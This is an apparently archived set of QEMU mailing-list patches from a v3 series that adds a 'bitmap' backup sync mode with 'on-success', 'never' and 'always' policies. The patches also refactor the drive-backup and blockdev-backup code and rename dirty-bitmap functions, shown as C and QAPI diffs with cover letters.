 1 file changed, 42 insertions(+), 39 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index efd0dcd2e7..3c08d057cc 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -38,7 +38,10 @@ typedef struct CowRequest {
 typedef struct BackupBlockJob {
 BlockJob common;
 BlockBackend *target;
+
 BdrvDirtyBitmap *sync_bitmap;
+BdrvDirtyBitmap *copy_bitmap;
+
 MirrorSyncMode sync_mode;
 BitmapSyncMode bitmap_mode;
 BlockdevOnError on_source_error;
@@ -51,7 +54,6 @@ typedef struct BackupBlockJob {
 NotifierWithReturn before_write;
 QLIST_HEAD(, CowRequest) inflight_reqs;
 
-HBitmap *copy_bitmap;
 bool use_copy_range;
 int64_t copy_range_size;
 
@@ -113,7 +115,7 @@ static int coroutine_fn 
backup_cow_with_bounce_buffer(BackupBlockJob *job,
 int write_flags = job->serialize_target_writes ? BDRV_REQ_SERIALISING : 0;
 
 assert(QEMU_IS_ALIGNED(start, job->cluster_size));
-hbitmap_reset(job->copy_bitmap, start, job->cluster_size);
+bdrv_reset_dirty_bitmap(job->copy_bitmap, start, job->cluster_size);
 nbytes = MIN(job->cluster_size, job->len - start);
 if (!*bounce_buffer) {
 *bounce_buffer = blk_blockalign(blk, job->cluster_size);
@@ -146,7 +148,7 @@ static int coroutine_fn 
backup_cow_with_bounce_buffer(BackupBlockJob *job,
 
 return nbytes;
 fail:
-hbitmap_set(job->copy_bitmap, start, job->cluster_size);
+bdrv_set_dirty_bitmap(job->copy_bitmap, start, job->cluster_size);
 return ret;
 
 }
@@ -169,12 +171,14 @@ static int coroutine_fn 
backup_cow_with_offload(BackupBlockJob *job,
 assert(QEMU_IS_ALIGNED(start, job->cluster_size));
 nbytes = MIN(job->copy_range_size, end - start);
 nr_clusters = DIV_ROUND_UP(nbytes, job->cluster_size);
-hbitmap_reset(job->copy_bitmap, start, job->cluster_size * nr_clusters);
+bdrv_reset_dirty_bitmap(job->copy_bitmap, start,
+job->cluster_size * nr_clusters);
 ret = blk_co_copy_range(blk, start, job->target, start, nbytes,
 read_flags, write_flags);
 if (ret < 0) {
 trace_backup_do_cow_copy_range_fail(job, start, ret);
-hbitmap_set(job->copy_bitmap, start, job->cluster_size * nr_clusters);
+bdrv_set_dirty_bitmap(job->copy_bitmap, start,
+  job->cluster_size * nr_clusters);
 return ret;
 }
 
@@ -202,7 +206,7 @@ static int coroutine_fn backup_do_cow(BackupBlockJob *job,
 cow_request_begin(_request, job, start, end);
 
 while (start < end) {
-if (!hbitmap_get(job->copy_bitmap, start)) {
+if (!bdrv_dirty_bitmap_get(job->copy_bitmap, start)) {
 trace_backup_do_cow_skip(job, start);
 start += job->cluster_size;
 continue; /* already copied */
@@ -298,14 +302,16 @@ static void backup_abort(Job *job)
 static void backup_clean(Job *job)
 {
 BackupBlockJob *s = container_of(job, BackupBlockJob, common.job);
+BlockDriverState *target_bs = blk_bs(s->target);
+
+if (s->copy_bitmap) {
+bdrv_release_dirty_bitmap(target_bs, s->copy_bitmap);
+s->copy_bitmap = NULL;
+}
+
 assert(s->target);
 blk_unref(s->target);
 s->target = NULL;
-
-if (s->copy_bitmap) {
-hbitmap_free(s->copy_bitmap);
-s->copy_bitmap = NULL;
-}
 }
 
 void backup_do_checkpoint(BlockJob *job, Error **errp)
@@ -320,7 +326,7 @@ void backup_do_checkpoint(BlockJob *job, Error **errp)
 return;
 }
 
-hbitmap_set(backup_job->copy_bitmap, 0, backup_job->len);
+bdrv_set_dirty_bitmap(backup_job->copy_bitmap, 0, backup_job->len);
 }
 
 static void backup_drain(BlockJob *job)
@@ -389,59 +395,52 @@ static bool bdrv_is_unallocated_range(BlockDriverState 
*bs,
 
 static int coroutine_fn backup_loop(BackupBlockJob *job)
 {
-int ret;
 bool error_is_read;
 int64_t offset;
-HBitmapIter hbi;
+BdrvDirtyBitmapIter *bdbi;
 BlockDriverState *bs = blk_bs(job->common.blk);
+int ret = 0;
 
-hbitmap_iter_init(, job->copy_bitmap, 0);
-while ((offset = hbitmap_iter_next()) != -1) {
+bdbi = bdrv_dirty_iter_new(job->copy_bitmap);
+while ((offset = bdrv_dirty_iter_next(bdbi)) != -1) {
 if (job->sync_mode == MIRROR_SYNC_MODE_TOP &&
 bdrv_is_unallocated_range(bs, offset, job->cluster_size))
 {
-hbitmap_reset(job->copy_bitmap, offset, job->cluster_size);
+bdrv_reset_dirty_bitmap(job->copy_bitmap, offset,
+job->cluster_size);
 continue;
 }
 
 do {
 if (yield_and_check(job)) {
-return 0;
+goto out;
 }
 ret =

[Qemu-block] [PATCH v3 10/18] block/dirty-bitmap: add bdrv_dirty_bitmap_get

2019-07-05 Thread John Snow

Add a public interface for get. While we're at it,
rename "bdrv_get_dirty_bitmap_locked" to "bdrv_dirty_bitmap_get_locked".

(There are more functions to rename to the bdrv_dirty_bitmap_VERB form,
but they will wait until the conclusion of this series.)

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 block/dirty-bitmap.c | 19 ---
 block/mirror.c   |  2 +-
 include/block/dirty-bitmap.h |  4 ++--
 migration/block.c|  5 ++---
 nbd/server.c |  2 +-
 5 files changed, 18 insertions(+), 14 deletions(-)

diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
index c5b66ae9ed..af8d7486db 100644
--- a/block/dirty-bitmap.c
+++ b/block/dirty-bitmap.c
@@ -509,14 +509,19 @@ BlockDirtyInfoList 
*bdrv_query_dirty_bitmaps(BlockDriverState *bs)
 }
 
 /* Called within bdrv_dirty_bitmap_lock..unlock */
-bool bdrv_get_dirty_locked(BlockDriverState *bs, BdrvDirtyBitmap *bitmap,
-   int64_t offset)
+bool bdrv_dirty_bitmap_get_locked(BdrvDirtyBitmap *bitmap, int64_t offset)
 {
-if (bitmap) {
-return hbitmap_get(bitmap->bitmap, offset);
-} else {
-return false;
-}
+return hbitmap_get(bitmap->bitmap, offset);
+}
+
+bool bdrv_dirty_bitmap_get(BdrvDirtyBitmap *bitmap, int64_t offset)
+{
+bool ret;
+bdrv_dirty_bitmap_lock(bitmap);
+ret = bdrv_dirty_bitmap_get_locked(bitmap, offset);
+bdrv_dirty_bitmap_unlock(bitmap);
+
+return ret;
 }
 
 /**
diff --git a/block/mirror.c b/block/mirror.c
index 42b3d9acd0..1da57409f0 100644
--- a/block/mirror.c
+++ b/block/mirror.c
@@ -476,7 +476,7 @@ static uint64_t coroutine_fn 
mirror_iteration(MirrorBlockJob *s)
 int64_t next_offset = offset + nb_chunks * s->granularity;
 int64_t next_chunk = next_offset / s->granularity;
 if (next_offset >= s->bdev_length ||
-!bdrv_get_dirty_locked(source, s->dirty_bitmap, next_offset)) {
+!bdrv_dirty_bitmap_get_locked(s->dirty_bitmap, next_offset)) {
 break;
 }
 if (test_bit(next_chunk, s->in_flight_bitmap)) {
diff --git a/include/block/dirty-bitmap.h b/include/block/dirty-bitmap.h
index 62682eb865..0120ef3f05 100644
--- a/include/block/dirty-bitmap.h
+++ b/include/block/dirty-bitmap.h
@@ -84,12 +84,12 @@ void bdrv_dirty_bitmap_set_busy(BdrvDirtyBitmap *bitmap, 
bool busy);
 void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const BdrvDirtyBitmap *src,
  HBitmap **backup, Error **errp);
 void bdrv_dirty_bitmap_set_migration(BdrvDirtyBitmap *bitmap, bool migration);
+bool bdrv_dirty_bitmap_get(BdrvDirtyBitmap *bitmap, int64_t offset);
 
 /* Functions that require manual locking.  */
 void bdrv_dirty_bitmap_lock(BdrvDirtyBitmap *bitmap);
 void bdrv_dirty_bitmap_unlock(BdrvDirtyBitmap *bitmap);
-bool bdrv_get_dirty_locked(BlockDriverState *bs, BdrvDirtyBitmap *bitmap,
-   int64_t offset);
+bool bdrv_dirty_bitmap_get_locked(BdrvDirtyBitmap *bitmap, int64_t offset);
 void bdrv_set_dirty_bitmap_locked(BdrvDirtyBitmap *bitmap,
   int64_t offset, int64_t bytes);
 void bdrv_reset_dirty_bitmap_locked(BdrvDirtyBitmap *bitmap,
diff --git a/migration/block.c b/migration/block.c
index 91f98ef44a..a5b60456ae 100644
--- a/migration/block.c
+++ b/migration/block.c
@@ -520,7 +520,6 @@ static int mig_save_device_dirty(QEMUFile *f, 
BlkMigDevState *bmds,
  int is_async)
 {
 BlkMigBlock *blk;
-BlockDriverState *bs = blk_bs(bmds->blk);
 int64_t total_sectors = bmds->total_sectors;
 int64_t sector;
 int nr_sectors;
@@ -535,8 +534,8 @@ static int mig_save_device_dirty(QEMUFile *f, 
BlkMigDevState *bmds,
 blk_mig_unlock();
 }
 bdrv_dirty_bitmap_lock(bmds->dirty_bitmap);
-if (bdrv_get_dirty_locked(bs, bmds->dirty_bitmap,
-  sector * BDRV_SECTOR_SIZE)) {
+if (bdrv_dirty_bitmap_get_locked(bmds->dirty_bitmap,
+ sector * BDRV_SECTOR_SIZE)) {
 if (total_sectors - sector < BDRV_SECTORS_PER_DIRTY_CHUNK) {
 nr_sectors = total_sectors - sector;
 } else {
diff --git a/nbd/server.c b/nbd/server.c
index 10faedcfc5..fbd51b48a7 100644
--- a/nbd/server.c
+++ b/nbd/server.c
@@ -2003,7 +2003,7 @@ static unsigned int bitmap_to_extents(BdrvDirtyBitmap 
*bitmap, uint64_t offset,
 bdrv_dirty_bitmap_lock(bitmap);
 
 it = bdrv_dirty_iter_new(bitmap);
-dirty = bdrv_get_dirty_locked(NULL, bitmap, offset);
+dirty = bdrv_dirty_bitmap_get_locked(bitmap, offset);
 
 assert(begin < overall_end && nb_extents);
 while (begin < overall_end && i < nb_extents) {
-- 
2.21.0

[Qemu-block] [PATCH v3 12/18] block/backup: add 'always' bitmap sync policy

2019-07-05 Thread John Snow

This adds an "always" policy for bitmap synchronization. Regardless of if
the job succeeds or fails, the bitmap is *always* synchronized. This means
that for backups that fail part-way through, the bitmap retains a record of
which sectors need to be copied out to accomplish a new backup using the
old, partial result.

In effect, this allows us to "resume" a failed backup; however the new backup
will be from the new point in time, so it isn't a "resume" as much as it is
an "incremental retry." This can be useful in the case of extremely large
backups that fail considerably through the operation and we'd like to not waste
the work that was already performed.

Signed-off-by: John Snow 
---
 block/backup.c   | 27 +++
 qapi/block-core.json |  5 -
 2 files changed, 23 insertions(+), 9 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index 3c08d057cc..b25e6179cf 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -268,18 +268,29 @@ static void backup_cleanup_sync_bitmap(BackupBlockJob 
*job, int ret)
 {
 BdrvDirtyBitmap *bm;
 BlockDriverState *bs = blk_bs(job->common.blk);
+bool sync = (((ret == 0) || (job->bitmap_mode == BITMAP_SYNC_MODE_ALWAYS)) 
\
+ && (job->bitmap_mode != BITMAP_SYNC_MODE_NEVER));
 
-if (ret < 0 || job->bitmap_mode == BITMAP_SYNC_MODE_NEVER) {
+if (sync) {
 /*
- * Failure, or we don't want to synchronize the bitmap.
- * Merge the successor back into the parent, delete nothing.
+ * We succeeded, or we always intended to sync the bitmap.
+ * Delete this bitmap and install the child.
  */
-bm = bdrv_reclaim_dirty_bitmap(bs, job->sync_bitmap, NULL);
-assert(bm);
-} else {
-/* Everything is fine, delete this bitmap and install the backup. */
 bm = bdrv_dirty_bitmap_abdicate(bs, job->sync_bitmap, NULL);
-assert(bm);
+} else {
+/*
+ * We failed, or we never intended to sync the bitmap anyway.
+ * Merge the successor back into the parent, keeping all data.
+ */
+bm = bdrv_reclaim_dirty_bitmap(bs, job->sync_bitmap, NULL);
+}
+
+assert(bm);
+
+if (ret < 0 && job->bitmap_mode == BITMAP_SYNC_MODE_ALWAYS) {
+/* If we failed and synced, merge in the bits we didn't copy: */
+bdrv_dirty_bitmap_merge_internal(bm, job->copy_bitmap,
+ NULL, true);
 }
 }
 
diff --git a/qapi/block-core.json b/qapi/block-core.json
index b1a98e..5a578806c5 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1149,10 +1149,13 @@
 # @never: The bitmap is never synchronized with the operation, and is
 # treated solely as a read-only manifest of blocks to copy.
 #
+# @always: The bitmap is always synchronized with the operation,
+#  regardless of whether or not the operation was successful.
+#
 # Since: 4.2
 ##
 { 'enum': 'BitmapSyncMode',
-  'data': ['on-success', 'never'] }
+  'data': ['on-success', 'never', 'always'] }
 
 ##
 # @MirrorCopyMode:
-- 
2.21.0

[Qemu-block] [PATCH v3 04/18] qapi: add BitmapSyncMode enum

2019-07-05 Thread John Snow

Depending on what a user is trying to accomplish, there might be a few
bitmap cleanup actions that occur when an operation is finished that
could be useful.

I am proposing three:
- NEVER: The bitmap is never synchronized against what was copied.
- ALWAYS: The bitmap is always synchronized, even on failures.
- ON-SUCCESS: The bitmap is synchronized only on success.

The existing incremental backup modes use 'on-success' semantics,
so add just that one for right now.

Signed-off-by: John Snow 
---
 qapi/block-core.json | 14 ++
 1 file changed, 14 insertions(+)

diff --git a/qapi/block-core.json b/qapi/block-core.json
index 0af3866015..0c853d00bd 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1134,6 +1134,20 @@
 { 'enum': 'MirrorSyncMode',
   'data': ['top', 'full', 'none', 'incremental'] }
 
+##
+# @BitmapSyncMode:
+#
+# An enumeration of possible behaviors for the synchronization of a bitmap
+# when used for data copy operations.
+#
+# @on-success: The bitmap is only synced when the operation is successful.
+#  This is the behavior always used for 'INCREMENTAL' backups.
+#
+# Since: 4.2
+##
+{ 'enum': 'BitmapSyncMode',
+  'data': ['on-success'] }
+
 ##
 # @MirrorCopyMode:
 #
-- 
2.21.0

[Qemu-block] [PATCH v3 06/18] block/backup: add 'never' policy to bitmap sync mode

2019-07-05 Thread John Snow

This adds a "never" policy for bitmap synchronization. Regardless of if
the job succeeds or fails, we never update the bitmap. This can be used
to perform differential backups, or simply to avoid the job modifying a
bitmap.

Signed-off-by: John Snow 
---
 block/backup.c   | 7 +--
 qapi/block-core.json | 5 -
 2 files changed, 9 insertions(+), 3 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index 996941fa61..efd0dcd2e7 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -265,8 +265,11 @@ static void backup_cleanup_sync_bitmap(BackupBlockJob 
*job, int ret)
 BdrvDirtyBitmap *bm;
 BlockDriverState *bs = blk_bs(job->common.blk);
 
-if (ret < 0) {
-/* Merge the successor back into the parent, delete nothing. */
+if (ret < 0 || job->bitmap_mode == BITMAP_SYNC_MODE_NEVER) {
+/*
+ * Failure, or we don't want to synchronize the bitmap.
+ * Merge the successor back into the parent, delete nothing.
+ */
 bm = bdrv_reclaim_dirty_bitmap(bs, job->sync_bitmap, NULL);
 assert(bm);
 } else {
diff --git a/qapi/block-core.json b/qapi/block-core.json
index 99dcd5f099..b1a98e 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1146,10 +1146,13 @@
 # @on-success: The bitmap is only synced when the operation is successful.
 #  This is the behavior always used for 'INCREMENTAL' backups.
 #
+# @never: The bitmap is never synchronized with the operation, and is
+# treated solely as a read-only manifest of blocks to copy.
+#
 # Since: 4.2
 ##
 { 'enum': 'BitmapSyncMode',
-  'data': ['on-success'] }
+  'data': ['on-success', 'never'] }
 
 ##
 # @MirrorCopyMode:
-- 
2.21.0

[Qemu-block] [PATCH v3 07/18] hbitmap: Fix merge when b is empty, and result is not an alias of a

2019-07-05 Thread John Snow

Nobody calls the function like this currently, but we neither prohibit
or cope with this behavior. I decided to make the function cope with it.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 util/hbitmap.c | 13 ++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/util/hbitmap.c b/util/hbitmap.c
index 7905212a8b..3b6acae42b 100644
--- a/util/hbitmap.c
+++ b/util/hbitmap.c
@@ -781,8 +781,9 @@ bool hbitmap_can_merge(const HBitmap *a, const HBitmap *b)
 }
 
 /**
- * Given HBitmaps A and B, let A := A (BITOR) B.
- * Bitmap B will not be modified.
+ * Given HBitmaps A and B, let R := A (BITOR) B.
+ * Bitmaps A and B will not be modified,
+ * except when bitmap R is an alias of A or B.
  *
  * @return true if the merge was successful,
  * false if it was not attempted.
@@ -797,7 +798,13 @@ bool hbitmap_merge(const HBitmap *a, const HBitmap *b, 
HBitmap *result)
 }
 assert(hbitmap_can_merge(b, result));
 
-if (hbitmap_count(b) == 0) {
+if ((!hbitmap_count(a) && result == b) ||
+(!hbitmap_count(b) && result == a)) {
+return true;
+}
+
+if (!hbitmap_count(a) && !hbitmap_count(b)) {
+hbitmap_reset_all(result);
 return true;
 }
 
-- 
2.21.0

[Qemu-block] [PATCH v3 02/18] drive-backup: create do_backup_common

2019-07-05 Thread John Snow

Create a common core that comprises the actual meat of what the backup API
boundary needs to do, and then switch drive-backup to use it.

Signed-off-by: John Snow 
---
 blockdev.c | 122 +
 1 file changed, 67 insertions(+), 55 deletions(-)

diff --git a/blockdev.c b/blockdev.c
index 4d141e9a1f..5bc8ecd087 100644
--- a/blockdev.c
+++ b/blockdev.c
@@ -3425,6 +3425,70 @@ out:
 aio_context_release(aio_context);
 }
 
+/* Common QMP interface for drive-backup and blockdev-backup */
+static BlockJob *do_backup_common(BackupCommon *backup,
+  BlockDriverState *bs,
+  BlockDriverState *target_bs,
+  AioContext *aio_context,
+  JobTxn *txn, Error **errp)
+{
+BlockJob *job = NULL;
+BdrvDirtyBitmap *bmap = NULL;
+int job_flags = JOB_DEFAULT;
+int ret;
+
+if (!backup->has_speed) {
+backup->speed = 0;
+}
+if (!backup->has_on_source_error) {
+backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
+}
+if (!backup->has_on_target_error) {
+backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
+}
+if (!backup->has_job_id) {
+backup->job_id = NULL;
+}
+if (!backup->has_auto_finalize) {
+backup->auto_finalize = true;
+}
+if (!backup->has_auto_dismiss) {
+backup->auto_dismiss = true;
+}
+if (!backup->has_compress) {
+backup->compress = false;
+}
+
+ret = bdrv_try_set_aio_context(target_bs, aio_context, errp);
+if (ret < 0) {
+return NULL;
+}
+
+if (backup->has_bitmap) {
+bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
+if (!bmap) {
+error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
+return NULL;
+}
+if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
+return NULL;
+}
+}
+
+if (!backup->auto_finalize) {
+job_flags |= JOB_MANUAL_FINALIZE;
+}
+if (!backup->auto_dismiss) {
+job_flags |= JOB_MANUAL_DISMISS;
+}
+
+job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
+backup->sync, bmap, backup->compress,
+backup->on_source_error, backup->on_target_error,
+job_flags, NULL, NULL, txn, errp);
+return job;
+}
+
 static BlockJob *do_drive_backup(DriveBackup *backup, JobTxn *txn,
  Error **errp)
 {
@@ -3432,39 +3496,16 @@ static BlockJob *do_drive_backup(DriveBackup *backup, 
JobTxn *txn,
 BlockDriverState *target_bs;
 BlockDriverState *source = NULL;
 BlockJob *job = NULL;
-BdrvDirtyBitmap *bmap = NULL;
 AioContext *aio_context;
 QDict *options = NULL;
 Error *local_err = NULL;
-int flags, job_flags = JOB_DEFAULT;
+int flags;
 int64_t size;
 bool set_backing_hd = false;
-int ret;
 
-if (!backup->has_speed) {
-backup->speed = 0;
-}
-if (!backup->has_on_source_error) {
-backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
-}
-if (!backup->has_on_target_error) {
-backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
-}
 if (!backup->has_mode) {
 backup->mode = NEW_IMAGE_MODE_ABSOLUTE_PATHS;
 }
-if (!backup->has_job_id) {
-backup->job_id = NULL;
-}
-if (!backup->has_auto_finalize) {
-backup->auto_finalize = true;
-}
-if (!backup->has_auto_dismiss) {
-backup->auto_dismiss = true;
-}
-if (!backup->has_compress) {
-backup->compress = false;
-}
 
 bs = bdrv_lookup_bs(backup->device, backup->device, errp);
 if (!bs) {
@@ -3541,12 +3582,6 @@ static BlockJob *do_drive_backup(DriveBackup *backup, 
JobTxn *txn,
 goto out;
 }
 
-ret = bdrv_try_set_aio_context(target_bs, aio_context, errp);
-if (ret < 0) {
-bdrv_unref(target_bs);
-goto out;
-}
-
 if (set_backing_hd) {
 bdrv_set_backing_hd(target_bs, source, _err);
 if (local_err) {
@@ -3554,31 +3589,8 @@ static BlockJob *do_drive_backup(DriveBackup *backup, 
JobTxn *txn,
 }
 }
 
-if (backup->has_bitmap) {
-bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
-if (!bmap) {
-error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
-goto unref;
-}
-if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
-goto unref;
-}
-}
-if (!backup->auto_finalize) {
-job_flags |= JOB_MANUAL_FINALIZE;
-}
-if (!backup->auto_dismiss) {
-job_flags |= JOB_MANUAL_DISMISS;
-}
-
-job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
-backup->sync, bmap, backup->compress,
-

[Qemu-block] [PATCH v3 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread John Snow

drive-backup and blockdev-backup have an awful lot of things in common
that are the same. Let's fix that.

I don't deduplicate 'target', because the semantics actually did change
between each structure. Leave that one alone so it can be documented
separately.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 qapi/block-core.json | 103 ++-
 1 file changed, 33 insertions(+), 70 deletions(-)

diff --git a/qapi/block-core.json b/qapi/block-core.json
index 0d43d4f37c..0af3866015 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1315,32 +1315,23 @@
   'data': { 'node': 'str', 'overlay': 'str' } }
 
 ##
-# @DriveBackup:
+# @BackupCommon:
 #
 # @job-id: identifier for the newly-created block job. If
 #  omitted, the device name will be used. (Since 2.7)
 #
 # @device: the device name or node-name of a root node which should be copied.
 #
-# @target: the target of the new image. If the file exists, or if it
-#  is a device, the existing file/device will be used as the new
-#  destination.  If it does not exist, a new file will be created.
-#
-# @format: the format of the new destination, default is to
-#  probe if @mode is 'existing', else the format of the source
-#
 # @sync: what parts of the disk image should be copied to the destination
 #(all the disk, only the sectors allocated in the topmost image, from a
 #dirty bitmap, or only new I/O).
 #
-# @mode: whether and how QEMU should create a new image, default is
-#'absolute-paths'.
-#
-# @speed: the maximum speed, in bytes per second
+# @speed: the maximum speed, in bytes per second. The default is 0,
+# for unlimited.
 #
 # @bitmap: the name of dirty bitmap if sync is "incremental".
 #  Must be present if sync is "incremental", must NOT be present
-#  otherwise. (Since 2.4)
+#  otherwise. (Since 2.4 (drive-backup), 3.1 (blockdev-backup))
 #
 # @compress: true to compress data, if the target format supports it.
 #(default: false) (since 2.8)
@@ -1370,75 +1361,47 @@
 # I/O.  If an error occurs during a guest write request, the device's
 # rerror/werror actions will be used.
 #
+# Since: 4.2
+##
+{ 'struct': 'BackupCommon',
+  'data': { '*job-id': 'str', 'device': 'str',
+'sync': 'MirrorSyncMode', '*speed': 'int',
+'*bitmap': 'str', '*compress': 'bool',
+'*on-source-error': 'BlockdevOnError',
+'*on-target-error': 'BlockdevOnError',
+'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
+
+##
+# @DriveBackup:
+#
+# @target: the target of the new image. If the file exists, or if it
+#  is a device, the existing file/device will be used as the new
+#  destination.  If it does not exist, a new file will be created.
+#
+# @format: the format of the new destination, default is to
+#  probe if @mode is 'existing', else the format of the source
+#
+# @mode: whether and how QEMU should create a new image, default is
+#'absolute-paths'.
+#
 # Since: 1.6
 ##
 { 'struct': 'DriveBackup',
-  'data': { '*job-id': 'str', 'device': 'str', 'target': 'str',
-'*format': 'str', 'sync': 'MirrorSyncMode',
-'*mode': 'NewImageMode', '*speed': 'int',
-'*bitmap': 'str', '*compress': 'bool',
-'*on-source-error': 'BlockdevOnError',
-'*on-target-error': 'BlockdevOnError',
-'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
+  'base': 'BackupCommon',
+  'data': { 'target': 'str',
+'*format': 'str',
+'*mode': 'NewImageMode' } }
 
 ##
 # @BlockdevBackup:
 #
-# @job-id: identifier for the newly-created block job. If
-#  omitted, the device name will be used. (Since 2.7)
-#
-# @device: the device name or node-name of a root node which should be copied.
-#
 # @target: the device name or node-name of the backup target node.
 #
-# @sync: what parts of the disk image should be copied to the destination
-#(all the disk, only the sectors allocated in the topmost image, or
-#only new I/O).
-#
-# @speed: the maximum speed, in bytes per second. The default is 0,
-# for unlimited.
-#
-# @bitmap: the name of dirty bitmap if sync is "incremental".
-#  Must be present if sync is "incremental", must NOT be present
-#  otherwise. (Since 3.1)
-#
-# @compress: true to compress data, if the target format supports it.
-#(default: false) (since 2.8)
-#
-# @on-source-error: the action to take on an error on the source,
-#   default 'report'.  'stop' and 'enospc' can only be used
-#   if the block device supports io-status (see BlockInfo).
-#
-# @on-target-error: the action to take on an error on the target,
-#   default 'report' (no limitations, since this applies to
-#   a different block device than @device).
-#
-# @auto-finalize: When false, this

[Qemu-block] [PATCH v3 03/18] blockdev-backup: utilize do_backup_common

2019-07-05 Thread John Snow

Signed-off-by: John Snow 
---
 blockdev.c | 65 +-
 1 file changed, 6 insertions(+), 59 deletions(-)

diff --git a/blockdev.c b/blockdev.c
index 5bc8ecd087..77365d8166 100644
--- a/blockdev.c
+++ b/blockdev.c
@@ -3624,78 +3624,25 @@ BlockJob *do_blockdev_backup(BlockdevBackup *backup, 
JobTxn *txn,
 {
 BlockDriverState *bs;
 BlockDriverState *target_bs;
-Error *local_err = NULL;
-BdrvDirtyBitmap *bmap = NULL;
 AioContext *aio_context;
-BlockJob *job = NULL;
-int job_flags = JOB_DEFAULT;
-int ret;
-
-if (!backup->has_speed) {
-backup->speed = 0;
-}
-if (!backup->has_on_source_error) {
-backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
-}
-if (!backup->has_on_target_error) {
-backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
-}
-if (!backup->has_job_id) {
-backup->job_id = NULL;
-}
-if (!backup->has_auto_finalize) {
-backup->auto_finalize = true;
-}
-if (!backup->has_auto_dismiss) {
-backup->auto_dismiss = true;
-}
-if (!backup->has_compress) {
-backup->compress = false;
-}
+BlockJob *job;
 
 bs = bdrv_lookup_bs(backup->device, backup->device, errp);
 if (!bs) {
 return NULL;
 }
 
-aio_context = bdrv_get_aio_context(bs);
-aio_context_acquire(aio_context);
-
 target_bs = bdrv_lookup_bs(backup->target, backup->target, errp);
 if (!target_bs) {
-goto out;
+return NULL;
 }
 
-ret = bdrv_try_set_aio_context(target_bs, aio_context, errp);
-if (ret < 0) {
-goto out;
-}
+aio_context = bdrv_get_aio_context(bs);
+aio_context_acquire(aio_context);
 
-if (backup->has_bitmap) {
-bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
-if (!bmap) {
-error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
-goto out;
-}
-if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
-goto out;
-}
-}
+job = do_backup_common(qapi_BlockdevBackup_base(backup),
+   bs, target_bs, aio_context, txn, errp);
 
-if (!backup->auto_finalize) {
-job_flags |= JOB_MANUAL_FINALIZE;
-}
-if (!backup->auto_dismiss) {
-job_flags |= JOB_MANUAL_DISMISS;
-}
-job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
-backup->sync, bmap, backup->compress,
-backup->on_source_error, backup->on_target_error,
-job_flags, NULL, NULL, txn, _err);
-if (local_err != NULL) {
-error_propagate(errp, local_err);
-}
-out:
 aio_context_release(aio_context);
 return job;
 }
-- 
2.21.0

[Qemu-block] [PATCH v3 00/18] bitmaps: introduce 'bitmap' sync mode

2019-07-05 Thread John Snow

This series adds a new "BITMAP" sync mode that is meant to replace the
existing "INCREMENTAL" sync mode.

This mode can have its behavior modified by issuing any of three bitmap sync
modes, passed as arguments to the job.

The three bitmap sync modes are:
- ON-SUCCESS: This is an alias for the old incremental mode. The bitmap is
  conditionally synchronized based on the return code of the job
  upon completion.
- NEVER: This is, effectively, the differential backup mode. It never clears
 the bitmap, as the name suggests.
- ALWAYS: Here is the new, exciting thing. The bitmap is always synchronized,
  even on failure. On success, this is identical to incremental, but
  on failure it clears only the bits that were copied successfully.
  This can be used to "resume" incremental backups from later points
  in times.

I wrote this series by accident on my way to implement incremental mode
for mirror, but this happened first -- the problem is that Mirror mode
uses its existing modes in a very particular way; and this was the best
way to add bitmap support into the mirror job properly.

Summary:
- 01-03: refactor blockdev-backup and drive-backup to share more interface code
- 04-05: add the new 'bitmap' sync mode with sync policy 'conditional',
 which is functionally identical to 'incremental' sync mode.
- 06:add sync policy 'never' ("Differential" backups.)
- 07-11: rework some merging code to facilite patch 12;
- 12:add sync policy 'always' ("Resumable" backups)
- 13-16: test infrastructure changes to support patch 16:
- 17:new iotest!
- 18:minor policy loosening as a QOL improvement

Future work:
 - Update bitmaps.rst to explain these. (WIP, it's hard, sorry!)
 - Add these modes to Mirror. (Done*, but needs tests.)
 - Allow the use of bitmaps and bitmap sync modes with non-BITMAP modes;
   This will allow for resumable/re-tryable full backups.

===
V3:
===

Key:
[] : patches are identical
[] : number of functional differences between upstream/downstream patch
[down] : patch is downstream-only
The flags [FC] indicate (F)unctional and (C)ontextual differences, respectively

001/18:[0006] [FC] 'qapi/block-core: Introduce BackupCommon'
002/18:[0032] [FC] 'drive-backup: create do_backup_common'
003/18:[0020] [FC] 'blockdev-backup: utilize do_backup_common'
004/18:[0006] [FC] 'qapi: add BitmapSyncMode enum'
005/18:[0019] [FC] 'block/backup: Add mirror sync mode 'bitmap''
